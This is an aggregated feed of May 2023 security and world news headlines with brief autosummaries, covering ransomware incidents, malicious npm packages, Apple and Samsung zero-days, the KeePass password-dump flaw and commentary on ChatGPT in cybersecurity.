                An AI-based Chrome Extension Against Phishing, Malware, and Ransomware

                financial exploits ransomware
                2023-05-22 https://www.bleepingcomputer.com/news/security/an-ai-based-chrome-extension-against-phishing-malware-and-ransomware/
                Criminal IP's Chrome extension offers real-time scanning of websites worldwide, using AI-based detection to identify recently created phishing sites. [...]

                Autosummary: Criminal IP, a prominent CTI search engine, conducted a successful beta service for approximately one year before its official launch (Source: AI SPERA). Since its official launch on April 17, 2023, Criminal IP has achieved global recognition in cybersecurity, establishing itself as a prominent CTI search engine through API integrations and strong partnerships.


                Indonesian Cybercriminals Exploit AWS for Profitable Crypto Mining Operations

                exploits ciber
                2023-05-22 https://thehackernews.com/2023/05/indonesian-cybercriminals-exploit-aws.html
                A financially motivated threat actor of Indonesian origin has been observed leveraging Amazon Web Services (AWS) Elastic Compute Cloud (EC2) instances to carry out illicit crypto mining operations. Cloud security company Permiso's P0 Labs, which first detected the group in November 2021, has assigned it the moniker GUI-vil (pronounced Goo-ee-vil). "The group displays a preference for Graphical "

                Autosummary: "The group displays a preference for Graphical User Interface (GUI) tools, specifically S3 Browser (version 9.5.5) for their initial operations," the company said in a report shared with The Hacker News. "


                Dish Network says the February ransomware attack impacted +300,000 individuals

                exploits ransomware
                2023-05-22 https://securityaffairs.com/146515/cyber-crime/dish-network-disclosed-data-breach.html

                Satellite TV giant Dish Network disclosed a data breach after the February ransomware attack and started notifying impacted individuals. The American satellite broadcast provider Dish Network went offline on February 24, 2023; the outage impacted Dish.com, the Dish Anywhere app, and many other services owned by the company. In early February, the company admitted that the outage was […]

                The post Dish Network says the February ransomware attack impacted +300,000 individuals appeared first on Security Affairs.

                "

                Autosummary: "


                Colombia conflict: Ceasefire with dissident Farc rebels suspended

                latam
                2023-05-22 https://www.bbc.co.uk/news/world-latin-america-65674709?at_medium=RSS&at_campaign=KARANGA
                The suspension is the latest blow to President Gustavo Petro's aim to achieve "total peace". "

                Autosummary: "


                Malicious Windows kernel drivers used in BlackCat ransomware attacks

                exploits ransomware
                2023-05-22 https://www.bleepingcomputer.com/news/security/malicious-windows-kernel-drivers-used-in-blackcat-ransomware-attacks/
                The ALPHV ransomware group (aka BlackCat) was observed employing signed malicious Windows kernel drivers to evade detection by security software during attacks. [...] "

                Autosummary: Malicious drivers used in BlackCat attacks (Trend Micro). Trend Micro's analysts observed the following exposed commands that can be issued to the driver: activate the driver; deactivate the driver after the user-mode client finishes its operation; kill any user-mode process; delete specific file paths; force-delete a file by freeing its handles and terminating running processes using it; copy files; force-copy files using a similar mechanism to force-delete; register Process/Thread Notification callbacks; unregister Process/Thread Notification callbacks; and reboot the system by calling the "HalReturnToFirmware" API. Copying files from the system (Trend Micro). Trend Micro comments that the two commands used for Process/Thread Notification callbacks are not working, indicating that the driver is currently under development or still in a testing phase. "


                Crypto phishing service Inferno Drainer defrauds thousands of victims

                financial
                2023-05-22 https://www.bleepingcomputer.com/news/security/crypto-phishing-service-inferno-drainer-defrauds-thousands-of-victims/
                A cryptocurrency phishing and scam service called "Inferno Drainer" has reportedly stolen over $5.9 million worth of crypto from 4,888 victims. [...] "

                Autosummary: Most assets ($4.3M) were stolen from the Mainnet, $790k were snatched from Arbitrum, $410k from Polygon, and $390k from BNB, totaling $5.9 million. "


                CISA adds iPhone bugs to its Known Exploited Vulnerabilities catalog

                exploits
                2023-05-22 https://securityaffairs.com/146531/security/cisa-iphone-bugs-known-exploited-vulnerabilities-catalog.html

                US CISA added three zero-day vulnerabilities affecting iPhones, Macs, and iPads to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added three zero-day vulnerabilities affecting iPhones, Macs, and iPads to its Known Exploited Vulnerabilities Catalog. The three issues reside in the WebKit browser engine and are tracked as CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373. Below […]

                The post CISA adds iPhone bugs to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

                "

                Autosummary: "


                Google launches bug bounty program for its Android applications

                exploits
                2023-05-22 https://www.bleepingcomputer.com/news/google/google-launches-bug-bounty-program-for-its-android-applications/
                Google has launched the Mobile Vulnerability Rewards Program (Mobile VRP), a new bug bounty program that will pay security researchers for flaws found in the company's Android applications. [...] "

                Autosummary: The list of in-scope apps also contains what Google describes as "Tier 1" Android applications, which include the following apps (and their package names): Google Play Services (com.google.android.gms), AGSA (com.google.android.googlequicksearchbox), Google Chrome (com.android.chrome), Google Cloud (com.google.android.apps.cloudconsole), Gmail (com.google.android.gm), and Chrome Remote Desktop (com.google.chromeremotedesktop). Qualifying vulnerabilities include those allowing arbitrary code execution (ACE) and theft of sensitive data, and weaknesses that could be chained with other flaws to lead to a similar impact. "


                ChatGPT: Cybersecurity friend or foe?

                ciber
                2023-05-22 https://www.malwarebytes.com/blog/business/2023/05/chatgpt-cybersecurity-friend-or-foe

                Categories: Business

                There are a lot of benefits to ChatGPT, but many in the security community have concerns about it. Malwarebytes' CEO Marcin Kleczynski takes a deep dive into the topic.


                The post ChatGPT: Cybersecurity friend or foe? appeared first on Malwarebytes Labs.

                "

                Autosummary: Unlike other chatbots, which are typically only able to produce canned replies on a few subjects, ChatGPT can mimic the style of celebrity CEOs, craft business pitches, compose music and song lyrics, answer test questions, simulate an entire chat room, write computer code, and much more. After further investigation, OpenAI discovered the vulnerability had exposed some user payment and personal data, including first and last names, email addresses, payment addresses, the last four digits of credit card numbers, and card expiration dates. According to the NIST AI Risk Management Framework published in January, an AI system can only be deemed trustworthy if it adheres to the following six criteria: valid and reliable; safe; secure and resilient; accountable and transparent; explainable and interpretable; and fair, with harmful biases managed. However, risks can emerge from socio-technical tensions and ambiguity related to how an AI program is used, its interactions with other systems, who operates it, and the context in which it is deployed. Both privacy and security concerns have prompted major banks, including Bank of America, JPMorgan Chase, Goldman Sachs, and Wells Fargo, to restrict or all-out ban ChatGPT and other generative AI models until they can be further vetted. Upon its launch in November 2022, tech enthusiasts quickly jumped at the shiny new disruptor, and for good reason: ChatGPT has the potential to democratize AI, personalize and simplify digital research, and assist in both creative problem-solving and tackling “busywork.” One of our researchers recently embarked on an experiment to get ChatGPT to write ransomware, and despite the chatbot’s initial protests that it couldn’t “engage in activities that violate ethical or legal standards, including those related to cybercrime or ransomware,” with a little coaxing, ChatGPT eventually complied.
                Because of its meteoric rise into public consciousness and rapid adoption, the generative AI chatbot has been the subject of continuing, complex conversations about its impact on the cybersecurity industry, threat landscape, and humanity as a whole. Assists engineers: Malware analysts and reverse engineers could also benefit from ChatGPT’s assistance on traditionally challenging tasks, such as writing proof-of-concept code, comparing language- or platform-specific conventions, and analyzing malware samples. To bring disparate security efforts together, the AI community will need to adopt a similar modus operandi to traditional software, which benefits from an entire ecosystem of government, academia, and enterprise that has developed over more than 20 years. The AI tool’s phishing skills begin and end with writing emails because, again, it lacks the coding talent to produce other elements like credential harvesters, infected macros, or obfuscated code. "


                TikTok sues Montana to overturn first US state ban

                government
                2023-05-22 https://www.bbc.co.uk/news/world-us-canada-65677768?at_medium=RSS&at_campaign=KARANGA
                The western state last week became the first in the US to ban the hugely-popular video platform. "

                Autosummary: "


                PyPI temporarily pauses new users, projects amid high volume of malware

                exploits
                2023-05-21 https://www.bleepingcomputer.com/news/security/pypi-temporarily-pauses-new-users-projects-amid-high-volume-of-malware/
                PyPI, the official third-party registry of open source Python packages, has temporarily suspended new users from signing up and new projects from being uploaded to the platform until further notice. The unexpected move comes amid the registry's struggle to keep up with a large influx of malicious users and packages. [...] "

                Autosummary: "


                Week in review: KeePass vulnerability, Apple fixes exploited WebKit 0-days

                exploits
                2023-05-21 https://www.helpnetsecurity.com/2023/05/21/week-in-review-keepass-vulnerability-apple-fixes-exploited-webkit-0-days/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Apple fixes WebKit 0-days under attack (CVE-2023-28204, CVE-2023-32373, CVE-2023-32409) Apple has released security updates for iOS and iPadOS, macOS, tvOS and watchOS, delivering fixes for many vulnerabilities but, most importantly, for CVE-2023-32409, a WebKit 0-day that “may have been actively exploited.” Google Cloud CISO on why the Google Cybersecurity Certificate matters In this Help Net Security interview, Phil Venables, CISO … More

                The post Week in review: KeePass vulnerability, Apple fixes exploited WebKit 0-days appeared first on Help Net Security.

                "

                Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Apple fixes WebKit 0-days under attack (CVE-2023-28204, CVE-2023-32373, CVE-2023-32409) Apple has released security updates for iOS and iPadOS, macOS, tvOS and watchOS, delivering fixes for many vulnerabilities but, most importantly, for CVE-2023-32409, a WebKit 0-day that “may have been actively exploited.” New infosec products of the week: May 19, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Bitwarden, Cloudflare, ComplyAdvantage, Enzoic, Neurotechnology, Nozomi Networks, and Satori. "


                Notorious Cyber Gang FIN7 Returns Cl0p Ransomware in New Wave of Attacks

                exploits ransomware
                2023-05-20 https://thehackernews.com/2023/05/notorious-cyber-gang-fin7-returns-cl0p.html
                The notorious cybercrime group known as FIN7 has been observed deploying Cl0p (aka Clop) ransomware, marking the threat actor's first ransomware campaign since late 2021. Microsoft, which detected the activity in April 2023, is tracking the financially motivated actor under its new taxonomy Sangria Tempest. "In these recent attacks, Sangria Tempest uses the PowerShell script POWERTRASH to load "

                Autosummary: "


                Dom Phillips and Bruno Pereira: Brazilian former official indicted over murders

                latam
                2023-05-20 https://www.bbc.co.uk/news/world-latin-america-65654878?at_medium=RSS&at_campaign=KARANGA
                The former head of Brazil's Indigenous protection agency is accused of indirectly playing a part in the journalist's death. "

                Autosummary: "


                Meet "Jack" from Romania! Mastermind Behind Golden Chickens Malware

                exploits
                2023-05-20 https://thehackernews.com/2023/05/meet-jack-from-romania-mastermind.html
                The identity of the second threat actor behind the Golden Chickens malware has been uncovered courtesy of a fatal operational security blunder, cybersecurity firm eSentire said. The individual in question, who lives in Bucharest, Romania, has been given the codename Jack. He is one of the two criminals operating an account on the Russian-language Exploit.in forum under the name "badbullzvenom," "

                Autosummary: "Like 'Chuck from Montreal,' 'Jack' uses multiple aliases for the underground forums, social media, and Jabber accounts, and he too has gone to great lengths to disguise himself," eSentire researchers Joe Stewart and Keegan Keplinger said. "By using the badbullzvenom and badbullz accounts, and unbeknownst to forum members, he is essentially starting with a clean slate, and he can continue to build his credibility under the account aliases: badbullz and badbullzvenom," the researchers explained. "


                US CISA warns of a Samsung vulnerability under active exploitation

                exploits
                2023-05-20 https://securityaffairs.com/146457/security/cisa-warns-samsung-flaw.html

                US CISA added the CVE-2023-21492 flaw affecting Samsung devices to its Known Exploited Vulnerabilities Catalog. US CISA added the CVE-2023-21492 vulnerability (CVSS score: 4.4) affecting Samsung devices to its Known Exploited Vulnerabilities Catalog. The issue affects Samsung mobile devices running Android 11, 12, and 13; it is described as an insertion of sensitive […]

                The post US CISA warns of a Samsung vulnerability under active exploitation appeared first on Security Affairs.

                "

                Autosummary: "


                npm packages hide TurkoRAT malware in what looks like a NodeJS EXE

                exploits
                2023-05-20 https://www.bleepingcomputer.com/news/security/npm-packages-hide-turkorat-malware-in-what-looks-like-a-nodejs-exe/
                Researchers have discovered multiple npm packages named after NodeJS libraries that even pack a Windows executable that resembles NodeJS but instead drops a sinister trojan. [...] "

                Autosummary: These packages, downloaded a little over 1,200 times in total, are: nodejs-encrypt-agent (versions 6.0.2, 6.0.3, 6.0.4, 6.0.5; 521 downloads), nodejs-cookie-proxy-agent (versions 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4; 678 downloads), and axios-proxy (versions 1.7.3, 1.7.4, 1.7.7, 1.7.9, 1.8.9, 1.9.9; 23 downloads). "First published more than two months ago, nodejs-encrypt-agent appears at first glance to be a legitimate package," state ReversingLabs researchers in their report. "


                Cybercrime gang FIN7 returned and was spotted delivering Clop ransomware

                exploits ransomware
                2023-05-20 https://securityaffairs.com/146465/cyber-crime/fin7-delivering-clop-ransomware.html

                Cybercriminal gang FIN7 returned with a new wave of attacks aimed at deploying the Clop ransomware on victims’ networks. Researchers at Microsoft Security Intelligence team published a series of tweets to warn of a new wave of attacks aimed at distributing the Clop ransomware and linked it to the financially motivated cybercriminal group Sangria Tempest […]

                The post Cybercrime gang FIN7 returned and was spotted delivering Clop ransomware appeared first on Security Affairs.

                "

                Autosummary: "


                Cloned CapCut websites push information stealing malware

                exploits
                2023-05-20 https://www.bleepingcomputer.com/news/security/cloned-capcut-websites-push-information-stealing-malware/
                A new malware distribution campaign is underway impersonating the CapCut video editing tool to push various malware strains to unsuspecting victims. [...] "

                Autosummary: Fake error message (Cyble). The malware will attempt to extract passwords and cookies from web browsers and specific filetypes (.txt, .lua, .pdf, .png, .jpg, .jpeg, .py, .cpp, and .db) from the user's desktop folder. "


                2021 data breach exposed data of 70 Million Luxottica customers

                financial
                2023-05-20 https://securityaffairs.com/146472/data-breach/luxottica-2021-data-breach.html

                Luxottica has finally confirmed the 2021 data breach that exposed the personal information of 70 million customers. Luxottica Group S.p.A. is an Italian eyewear conglomerate and the world’s largest company in the eyewear industry. As a vertically integrated company, Luxottica designs, manufactures, distributes and retails its eyewear brands, including LensCrafters, Sunglass Hut, Apex by Sunglass Hut, […]

                The post 2021 data breach exposed data of 70 Million Luxottica customers appeared first on Security Affairs.

                "

                Autosummary: As a vertically integrated company, Luxottica designs, manufactures, distributes and retails its eyewear brands, including LensCrafters, Sunglass Hut, Apex by Sunglass Hut, Pearle Vision, Target Optical, Eyemed vision care plan, and Glasses.com. "


                Exploring the tactics of phishing and scam websites in 2023

                financial industry
                2023-05-19 https://www.helpnetsecurity.com/2023/05/19/tactics-phishing-scam-websites-2023-video/

                Phishing scams pose an escalating danger as cybercriminals employ increasingly sophisticated techniques, rendering their detection and prevention more challenging. In this Help Net Security video, Abhilash Garimella, Head of Research at Bolster, talks about the evolution of phishing and scam websites in 2023.

                The post Exploring the tactics of phishing and scam websites in 2023 appeared first on Help Net Security.

                "

                Autosummary: "


                Searching for AI Tools? Watch Out for Rogue Sites Distributing RedLine Malware

                exploits
                2023-05-19 https://thehackernews.com/2023/05/searching-for-ai-tools-watch-out-for.html
                Malicious Google Search ads for generative AI services like OpenAI ChatGPT and Midjourney are being used to direct users to sketchy websites as part of a BATLOADER campaign designed to deliver RedLine Stealer malware. "Both AI services are extremely popular but lack first-party standalone apps (i.e., users interface with ChatGPT via their web interface while Midjourney uses Discord)," eSentire "

                Autosummary: eSentire, in January, traced the identity of one of the key operators of the malware-as-a-service (MaaS) to an individual located in Montreal, Canada. "


                WebKit Under Attack: Apple Issues Emergency Patches for 3 New Zero-Day Vulnerabilities

                exploits
                2023-05-19 https://thehackernews.com/2023/05/webkit-under-attack-apple-issues.html
                Apple on Thursday rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and the Safari web browser to address three new zero-day flaws that it said are being actively exploited in the wild. The three security shortcomings are listed below - CVE-2023-32409 - A WebKit flaw that could be exploited by a malicious actor to break out of the Web Content sandbox. It was addressed with "

                Autosummary: The latest updates are available for the following devices: iOS 16.5 and iPadOS 16.5 - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later; iOS 15.7.6 and iPadOS 15.7.6 - iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation); macOS "


                Developer Alert: NPM Packages for Node.js Hiding Dangerous TurkoRat Malware

                exploits
                2023-05-19 https://thehackernews.com/2023/05/developer-alert-npm-packages-for-nodejs.html
                Two malicious packages discovered in the npm package repository have been found to conceal an open source information stealer malware called TurkoRat. The packages – named nodejs-encrypt-agent and nodejs-cookie-proxy-agent – were collectively downloaded approximately 1,200 times and were available for more than two months before they were identified and taken down. ReversingLabs, which broke "

                Autosummary: The rogue packages and their associated versions are listed below: nodejs-encrypt-agent (versions 6.0.2, 6.0.3, 6.0.4, and 6.0.5), nodejs-cookie-proxy-agent (versions 1.1.0, 1.2.0, 1.2.1, 1.2.2, 1.2.3, and 1.2.4), and axios-proxy (versions 1.7.3, 1.7.4, 1.7.7, 1.7.9, 1.8.9, and 1.9.9). "TurkoRat is just one of many open source malware families that are offered for 'testing' purposes, but can readily be downloaded and modified for malicious use, as well," Lucija Valentić, threat researcher at ReversingLabs, said. "


                Dish Network likely paid ransom after recent ransomware attack

                exploits ransomware
                2023-05-19 https://www.bleepingcomputer.com/news/security/dish-network-likely-paid-ransom-after-recent-ransomware-attack/
                Dish Network, an American television provider, most likely paid a ransom after being hit by a ransomware attack in February based on the wording used in data breach notification letters sent to impacted employees. [...] "

                Autosummary: "However, we have confirmed that certain employee-related records and personal information (along with information of some former employees, family members, and a limited number of other individuals) were among the data extracted. "


                Luxottica confirms 2021 data breach after info of 70M leaks online

                financial
                2023-05-19 https://www.bleepingcomputer.com/news/security/luxottica-confirms-2021-data-breach-after-info-of-70m-leaks-online/
                Luxottica has confirmed one of its partners suffered a data breach in 2021 that exposed the personal information of 70 million customers after a database was posted this month for free on hacking forums. [...] "

                Autosummary: Luxottica is the world’s largest eyewear company, a maker of glasses and prescription frames, and the owner of popular brands like Ray-Ban, Oakley, Chanel, Prada, Versace, Dolce and Gabbana, Burberry, Giorgio Armani, Michael Kors, and many others. "


                Take action now to avoid BianLian ransomware attacks, US Government warns organisations

                exploits government ransomware
                2023-05-19 https://www.tripwire.com/state-of-security/take-action-now-avoid-bianlian-ransomware-attacks-us-government-warns
                A joint alert has been issued by US government agencies, advising organisations of the steps they should take to mitigate the threat posed by BianLian ransomware attacks. "

                Autosummary: "


                NTT and Cisco help customers transition to IoT-as-a-Service model

                industry
                2023-05-19 https://www.helpnetsecurity.com/2023/05/19/ntt-and-cisco-help-customers-transition-to-iot-as-a-service-model/

                NTT and Cisco have announced a collaboration to develop and deploy joint solutions that empower organizations to improve operational efficiencies and advance sustainability goals. Leveraging NTT’s Edge as a Service portfolio and Cisco’s IoT capabilities, solutions developed by the two companies will offer real-time data insights, enhanced security, improved decision-making, and reduced operational costs through predictive maintenance, asset tracking, and supply chain management capabilities. The companies will deliver solutions that combine NTT’s Managed Services expertise, … More

                The post NTT and Cisco help customers transition to IoT-as-a-Service model appeared first on Help Net Security.

                "

                Autosummary: Leveraging NTT’s Edge as a Service portfolio and Cisco’s IoT capabilities, solutions developed by the two companies will offer real-time data insights, enhanced security, improved decision-making, and reduced operational costs through predictive maintenance, asset tracking, and supply chain management capabilities. "


                Strata Identity unifies Maverics ID Orchestration functions across environments

                industry
                2023-05-19 https://www.helpnetsecurity.com/2023/05/19/strata-identity-id-orchestration/

                Strata Identity has unveiled the latest version of the Maverics platform that enables customers to unify ID Orchestration functions between legacy on-premises, modern cloud, and multi-vendor environments without rewriting their applications. With Maverics, businesses easily create a vendor-agnostic identity fabric through a visual management interface that supports any identity provider (IDP), including legacy on-premises systems and cloud systems from AWS, Azure, Okta and GCP. According to a Gartner report: “Orchestration through access management can be … More

                The post Strata Identity unifies Maverics ID Orchestration functions across environments appeared first on Help Net Security.

                "

                Autosummary: "


                Council accidentally published staff salaries online

                government
                2023-05-19 https://www.bbc.co.uk/news/uk-scotland-glasgow-west-65648518?at_medium=RSS&at_campaign=KARANGA
                Personal details of 15,000 South Lanarkshire council staff, including their salaries, were posted online. "

                Autosummary: "


                CISA warns of Samsung ASLR bypass flaw exploited in attacks

                exploits
                2023-05-19 https://www.bleepingcomputer.com/news/security/cisa-warns-of-samsung-aslr-bypass-flaw-exploited-in-attacks/
                CISA warned today of a security vulnerability affecting Samsung devices used in attacks to bypass Android address space layout randomization (ASLR) protection. [...] "

                Autosummary: "


                Microsoft: Notorious FIN7 hackers return in Clop ransomware attacks

                exploits ransomware
                2023-05-19 https://www.bleepingcomputer.com/news/security/microsoft-notorious-fin7-hackers-return-in-clop-ransomware-attacks/
                A financially motivated cybercriminal group known as FIN7 resurfaced last month, with Microsoft threat analysts linking it to attacks where the end goal was the deployment of Clop ransomware payloads on victims' networks. [...] "

                Autosummary: "


                The Week in Ransomware - May 19th 2023 - A Shifting Landscape

                exploits ransomware
                2023-05-19 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-may-19th-2023-a-shifting-landscape/
                In the ever-shifting ransomware landscape, we saw new ransomware gangs emerge, threat actors return from a long absence, operations shifting extortion tactics, and a flurry of attacks on the enterprise. [...] "

                Autosummary: We also learned about new attacks and significant developments in previous ones: Finally, researchers and law enforcement released new reports: Contributors and those who provided new ransomware information and stories this week include: @serghei, @LawrenceAbrams, @PolarToffee, @malwrhunterteam, @DanielGallagher, @Ionut_Ilascu, @demonslay335, @billtoulas, @Seifreed, @BleepinComputer, @fwosar, @VK_Intel, @struppigel, @BrettCallow, @TalosSecurity, @CrowdStrike, @pcrisk, @GroupIB, @zscaler, @MsftSecIntel, and @juanbrodersen. Over the past few weeks, we have reported on new ransomware operations that have emerged in enterprise attacks, including the new Cactus, Akira, RA Group operations. "


                LayerZero launches record-breaking $15M crypto bug bounty program

                exploits
                2023-05-18 https://www.bleepingcomputer.com/news/security/layerzero-launches-record-breaking-15m-crypto-bug-bounty-program/
                LayerZero Labs has launched a bug bounty on the Immunefi platform that offers a maximum reward of $15 million for critical smart contract and blockchain vulnerabilities, a figure that sets a new record in the crypto space. [...] "

                Autosummary: Medium-severity vulnerabilities will pay between $10,000 and $25,000. Low-severity issues have the still notable payout range of $1,000 to $10,000. For Group 2, which concerns all other blockchains supported by LayerZero, the maximum payout is $1,500,000 for critical findings, $25,000 for high-severity, $10,000 for medium, and $5,000 for low-impact flaws. "


                Apple fixes three new zero-days exploited to hack iPhones, Macs

                exploits
                2023-05-18 https://www.bleepingcomputer.com/news/apple/apple-fixes-three-new-zero-days-exploited-to-hack-iphones-macs/
                Apple has addressed three new zero-day vulnerabilities exploited in attacks to hack into iPhones, Macs, and iPads. [...] "

                Autosummary: iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), iPod touch (7th generation), and iPhone 8 and later iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later Macs running macOS "


                Cybercrime gang pre-infects millions of Android devices with malware

                exploits
                2023-05-18 https://www.bleepingcomputer.com/news/security/cybercrime-gang-pre-infects-millions-of-android-devices-with-malware/
                A cybercriminal tracked as the "Lemon Group" has been infecting millions of Android-based smartphones, watches, TVs, and TV boxes, with a malware strain named "Guerilla." [...] "

                Autosummary: By monitoring the operation, the analysts detected over 490,000 mobile numbers used for generating one-time password requests for SMS PVA services from JingDong, WhatsApp, Facebook, QQ, Line, Tinder, and other platforms. These functions allow the Lemon Group to establish a diverse monetization strategy that could include selling compromised accounts, hijacking network resources, offering app-installation services, generating fraudulent ad impressions, offering proxy services, and SMS Phone Verified Accounts (PVA) services. "


                KeePass exploit helps retrieve cleartext master password, fix coming soon

                exploits
                2023-05-18 https://www.bleepingcomputer.com/news/security/keepass-exploit-helps-retrieve-cleartext-master-password-fix-coming-soon/
                The popular KeePass password manager is vulnerable to extraction of the master password from the application's memory, allowing attackers who compromise a device to retrieve the password even when the database is locked. [...] "

                Autosummary: A new KeePass vulnerability tracked as CVE-2023-3278 makes it possible to recover the KeePass master password, apart from the first one or two characters, in cleartext form, regardless of whether the KeePass workspace is locked, or possibly, even if the program is closed. In our tests, you can use Process Explorer to dump the memory of the KeePass project, but it requires a full memory dump, and not a minidump, to work correctly. "


                KeePass vulnerability allows attackers to access the master password

                exploits
                2023-05-18 https://www.malwarebytes.com/blog/news/2023/05/keepass-vulnerability-allows-attackers-to-access-the-master-password

                Categories: Exploits and vulnerabilities

                Categories: News

                Categories: Personal

                Tags: KeePass

                Tags: memory dump

                Tags: CVE-2023-32784

                There is a Proof-of-Concept available for an unpatched vulnerability in KeePass that allows attackers to dump the master password.

                (Read more...)

                The post KeePass vulnerability allows attackers to access the master password appeared first on Malwarebytes Labs.

                "

                Autosummary: For those with the more serious threat model of system confiscation that we mentioned earlier, the researcher that found the issue posted the advice to follow these steps: change your master password; delete the hibernation file; delete the pagefile/swapfile; overwrite deleted data on the HDD to prevent carving (e.g. Cipher with /w on Windows); restart your computer. Or just overwrite your hard disk drive (HDD) and do a fresh install of your operating system (OS). "


                How to Reduce Exposure on the Manufacturing Attack Surface

                industry
                2023-05-18 https://thehackernews.com/2023/05/how-to-reduce-exposure-on-manufacturing.html
                Digitalization initiatives are connecting once-isolated Operational Technology (OT) environments with their Information Technology (IT) counterparts. This digital transformation of the factory floor has accelerated the connection of machinery to digital systems and data. Computer systems for managing and monitoring digital systems and data have been added to the hardware and software used for "

                Autosummary: According to Security Scorecard, 48%, nearly half, of the manufacturing companies reviewed scored a C, D, or F in security. In fact, in 2022 alone, there were 2,337 security breaches of manufacturing systems, 338 with confirmed data disclosure (Verizon, 2022 DBIR Report). With minimal set up, requiring no agents or pre-installations, security and IT teams at manufacturing companies can safely challenge their complete attack surface to pinpoint the most damaging security gaps - just like a real-life attacker would. 5 — Benchmark Your Security Posture: By continuously testing your attack surface at regular, frequent intervals, you can continuously benchmark your security posture. "


                8220 Gang Exploiting Oracle WebLogic Flaw to Hijack Servers and Mine Cryptocurrency

                exploits
                2023-05-18 https://thehackernews.com/2023/05/8220-gang-exploiting-oracle-weblogic.html
                The notorious cryptojacking group tracked as 8220 Gang has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware. The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, when successfully exploited, could allow an unauthenticated attacker to execute arbitrary commands "

                Autosummary: The intermediate DLL file, for its part, is configured to download a cryptocurrency miner from one of the three C2 servers – 179.43.155[.]202, work.letmaker[.]top, and su-94.letmaker[.]top – using TCP ports 9090, 9091, or 9092. "


                Darknet Carding Kingpin Pleads Guilty: Sold Financial Info of Tens of Thousands

                financial
                2023-05-18 https://thehackernews.com/2023/05/darknet-carding-kingpin-pleads-guilty.html
                A U.S. national has pleaded guilty in a Missouri court to operating a darknet carding site and selling financial information belonging to tens of thousands of victims in the country. Michael D. Mihalo, aka Dale Michael Mihalo Jr. and ggmccloud1, has been accused of setting up a carding site called Skynet Market that specialized in the trafficking of credit and debit card data. Mihalo and his "

                Autosummary: Mihalo and his associates also peddled their warez on other dark web marketplaces such as AlphaBay Market, Wall Street Market, and Hansa Market between February 22, 2016, and October 1, 2019. "


                Colombia plane crash: Children reportedly survived 16 days in jungle

                latam
                2023-05-18 https://www.bbc.co.uk/news/world-latin-america-65630020?at_medium=RSS&at_campaign=KARANGA
                The children disappeared after their plane crashed but it remains unclear if they have been rescued. "

                Autosummary: "


                Montana TikTok creators shrug off state's ban on app

                government
                2023-05-18 https://www.bbc.co.uk/news/world-us-canada-65642954?at_medium=RSS&at_campaign=KARANGA
                Montana is the first US state to ban the app, but influencers there don't seem too concerned. "

                Autosummary: "


                Critics say £1bn for UK chip industry not enough

                industry
                2023-05-18 https://www.bbc.co.uk/news/technology-65633812?at_medium=RSS&at_campaign=KARANGA
                One CEO says the government's semiconductor strategy does not address the needs of UK chipmakers. "

                Autosummary: "


                TikTok: Montana to become first US state to ban app on personal devices

                government
                2023-05-18 https://www.bbc.co.uk/news/business-65630201?at_medium=RSS&at_campaign=KARANGA
                The Chinese-owned platform said the ban "infringes on the First Amendment rights of the people of Montana". "

                Autosummary: "


                Apple fixed three new actively exploited zero-day vulnerabilities

                exploits
                2023-05-18 https://securityaffairs.com/146411/security/apple-3-new-zero-day-bugs.html

                Apple released security updates to address three zero-day vulnerabilities in iPhones, Macs, and iPads that are actively exploited in attacks. Apple has addressed three new zero-day vulnerabilities that are actively exploited in attacks in the wild to hack into iPhones, Macs, and iPads. The three vulnerabilities, tracked as CVE-2023-32409, CVE-2023-28204, and CVE-2023-32373, reside in the […]

                The post Apple fixed three new actively exploited zero-day vulnerabilities appeared first on Security Affairs.

                "

                Autosummary: In February, the company released emergency security updates to address an actively exploited zero-day vulnerability, tracked as CVE-2023-23529, that impacts iOS, iPadOS, and macOS. "


                ScanSource says ransomware attack behind multi-day outages

                exploits ransomware
                2023-05-17 https://www.bleepingcomputer.com/news/security/scansource-says-ransomware-attack-behind-multi-day-outages/
                Technology provider ScanSource has announced it has fallen victim to a ransomware attack impacting some of its systems, business operations, and customer portals. [...] "

                Autosummary: "


                FBI confirms BianLian ransomware switch to extortion only attacks

                exploits ransomware
                2023-05-17 https://www.bleepingcomputer.com/news/security/fbi-confirms-bianlian-ransomware-switch-to-extortion-only-attacks/
                The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) have published a joint advisory to inform organizations of the latest tactics, techniques, and procedures (TTPs) and known indicators of compromise (IOCs) of the BianLian ransomware group. [...] "

                Autosummary: A joint Cybersecurity Advisory from government agencies in the U.S. and Australia, published by the Cybersecurity and Infrastructure Security Agency (CISA), is warning organizations of the latest tactics, techniques, and procedures (TTPs) used by the BianLian ransomware group. "


                Cisco warns of critical switch bugs with public exploit code

                exploits
                2023-05-17 https://www.bleepingcomputer.com/news/security/cisco-warns-of-critical-switch-bugs-with-public-exploit-code/
                Cisco warned customers today of four critical remote code execution vulnerabilities with public exploit code affecting multiple Small Business Series Switches. [...] "

                Autosummary: "


                Microsoft pulls Defender update fixing Windows LSA Protection bug

                exploits
                2023-05-17 https://www.bleepingcomputer.com/news/microsoft/microsoft-pulls-defender-update-fixing-windows-lsa-protection-bug/
                Microsoft has pulled a recent Microsoft Defender update that was supposed to fix a known issue triggering persistent restart alerts and Windows Security warnings that Local Security Authority (LSA) Protection is off. [...] "

